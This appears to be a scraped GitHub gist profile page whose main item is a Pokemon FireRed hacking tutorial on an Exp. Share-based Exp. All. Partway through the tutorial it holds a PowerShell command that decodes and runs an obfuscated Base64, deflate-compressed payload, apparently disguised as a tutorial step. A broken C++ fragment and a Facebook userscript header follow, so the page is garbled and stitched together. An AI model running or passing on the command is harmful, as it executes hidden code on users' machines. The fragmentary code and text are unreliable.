Skip to content

Instantly share code, notes, and snippets.

View Mixone-FinallyHere's full-sized avatar
💭
Modding

Miguel Mixone-FinallyHere

💭
Modding
View GitHub Profile
@Mixone-FinallyHere
Mixone-FinallyHere / Gen 6 Exp All.md
Created October 6, 2022 15:01
Gen6 Exp Share All Tutorial

Exp. All via remodel of Exp. Share

FireRed USA Version 1.0

This tutorial shows how to add Gen. 6 Exp. All system to Fire Red and attach it to a key item that enables or disables it. It is based on existing tutorials with the few errors or bugs patched and puts together various pieces of info to have it grouped in one single tutorial. For the purpose of this tutorial the item will be the Exp. Share.

This tutorial is aimed for users with little to no knowledge of AM or HexEditing.

The first thing you need to do is find around 420 bytes of free space. Not all is needed but it is better to be safe than sorry.

powershell -NoExit -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8iztfLaVtUy/R5lc2OV8VvnPzi3zhJ6fndqnJ2WtdVfSzff5b+bhdlNcnKR96nL+v8PK/z5TQ/1Lc2tSEYH70uynzZltcn1bItluv8I/NimzctNfjey+oqr5+uF6vxi6wtLvPv3xJyB199qzhPtxj0nVQ+0NHh+fE0K+s8m12nJY09n7lv6rxd18tDfSX9Jb9x8hsnv9u0mqGf3/Pj3zhZN8XyIn193bT54jD8c/w6n67ror0en9TXq7a6qLPV/Lrb6NWaRr/Ix2fLNq+r1eu8viymedNt9iZ/1x6i82W2yJtVRgO15LETtVpPymKaTsusaVKhWTDU7z0ty7PFqqrbrY+y2WW2Ku7tjWdl+dEoPZln9escZNffxsfrtrrzfR23Qm5aAjpNCZe8XqbFsk1f5RdfrvLl75Vfn77bcmTDV3P6cOQ+atoa42nWk/BzNF2XX64wVU3n8yZbPM2bos5n3hfVuhX4b1/lzbps7zBd8M2G8Z0u2/r6ZYX3iPUI69PlesFYf2QGqaMKh6pjtK27Y3zbG0uxnOXvvM9e87ifrItyltdpuXpBE+h9TYzLr5Wr6aTzFT6u84Y4Ihh/F+AJpnsAYvc70K6saBrK1Xn7PGva7xKD5m+IAe8cvhcVPwMNf2Kd19dny/OKSAMeysqSMCN5viTBpun8rPfJ+LvFkgCOUuIwdM9i+llbr/PbzILf3+aJ+
#include <iostream>
using namespace std;
int main {
struct {int x, y; char tag;} point1, point2;
point1.x = 1; point1.y = 3; point1.tag = 'A';
point2.x = 4; point2.y = 7; point1.tag = 'B';
return 0;
@Mixone-FinallyHere
Mixone-FinallyHere / De-Lefter
Created April 15, 2015 09:53
Removes the left column from facebook browser.
// ==UserScript==
// @name De-Lefter
// @namespace http://your.homepage/
// @version 1
// @description Remove left collumn from facebook
// @author You
// @match https://monkeyguts.com/code.php?nav=code&id=628
// @grant none
// @require http://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js
// @include https://*.facebook.com/*